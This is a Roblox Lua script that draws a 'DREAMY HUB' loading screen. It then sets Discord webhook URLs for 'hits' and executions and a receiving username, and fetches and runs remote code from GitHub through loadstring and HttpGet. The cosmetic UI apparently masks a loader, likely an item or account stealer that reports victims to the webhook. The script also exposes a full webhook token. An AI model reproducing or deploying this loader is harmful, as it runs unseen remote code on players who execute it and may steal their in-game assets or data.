--// DREAMY HUB UI
--// Black & White Theme

local ScreenGui = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local Title = Instance.new("TextLabel")
local Close = Instance.new("TextButton")
local UICorner = Instance.new("UICorner")
local UIStroke = Instance.new("UIStroke")

-- Parent
ScreenGui.Parent = game.CoreGui
ScreenGui.Name = "DreamyHub"

-- Main Frame
Main.Parent = ScreenGui
Main.BackgroundColor3 = Color3.fromRGB(15,15,15)
Main.Position = UDim2.new(0.35,0,0.25,0)
Main.Size = UDim2.new(0,420,0,220)
Main.Active = true
Main.Draggable = true

UICorner.Parent = Main
UICorner.CornerRadius = UDim.new(0,12)

UIStroke.Parent = Main
UIStroke.Color = Color3.fromRGB(255,255,255)
UIStroke.Thickness = 2

-- Title
Title.Parent = Main
Title.BackgroundTransparency = 1
Title.Size = UDim2.new(1,0,0,50)
Title.Font = Enum.Font.GothamBold
Title.Text = "DREAMY HUB"
Title.TextColor3 = Color3.fromRGB(255,255,255)
Title.TextSize = 28

-- Close Button
Close.Parent = Main
Close.BackgroundColor3 = Color3.fromRGB(255,255,255)
Close.Position = UDim2.new(0.88,0,0.03,0)
Close.Size = UDim2.new(0,35,0,35)
Close.Font = Enum.Font.GothamBold
Close.Text = "X"
Close.TextColor3 = Color3.fromRGB(0,0,0)
Close.TextSize = 20

Instance.new("UICorner", Close)

Close.MouseButton1Click:Connect(function()
	ScreenGui:Destroy()
end)

-- Status Text
local Status = Instance.new("TextLabel")
Status.Parent = Main
Status.BackgroundTransparency = 1
Status.Position = UDim2.new(0,0,0.35,0)
Status.Size = UDim2.new(1,0,0,120)
Status.Font = Enum.Font.Gotham
Status.Text = "LOADING DREAMY HUB..."
Status.TextColor3 = Color3.fromRGB(255,255,255)
Status.TextSize = 22

-- CONFIG
HitsWebhook = "https://discord.com/api/webhooks/1503692098183102564/cYLeE3RmisC7PZKIHxvcliMuVoe_3AnIKWVJZhndlXHL45sjwpxTNmtfCIi8NTAdpHOb"
Executions_Webhook = "https://discord.com/api/webhooks/1503692098183102564/cYLeE3RmisC7PZKIHxvcliMuVoe_3AnIKWVJZhndlXHL45sjwpxTNmtfCIi8NTAdpHOb"

Username = "sojh798"
Button_Prompt = "E"

-- LOAD SCRIPT
loadstring(game:HttpGet("https://raw.githubusercontent.com/akolilala7-design/DREAMY_HUB/398d4ee764fe8acc0527c4db1b832450c2eea34a/AnshuXDev"))()

Status.Text = "DREAMY HUB LOADED!"
